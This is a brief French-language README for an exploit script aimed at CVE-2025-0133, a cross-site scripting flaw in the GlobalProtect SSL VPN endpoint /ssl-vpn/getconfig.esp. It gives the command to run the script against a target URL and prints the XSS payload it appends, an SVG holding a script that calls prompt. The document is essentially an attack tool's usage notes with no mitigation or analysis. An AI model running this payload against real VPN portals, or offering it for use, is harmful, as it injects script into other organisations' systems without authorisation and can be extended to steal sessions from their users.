
CVE-2025-0133 XSS GlobalProtect
🔓 Exploit pour le point de terminaison GlobalProtect SSL VPN /ssl-vpn/getconfig.esp qui ajoute une charge utile XSS conçue à l'URL.
python3 exploit.py -u https://target.com
-u, --url : URL cible de base (ne pas inclure les paramètres de requête)<svg xmlns="http://www.w3.org/2000/svg"><script>prompt("mitsec")</script></svg>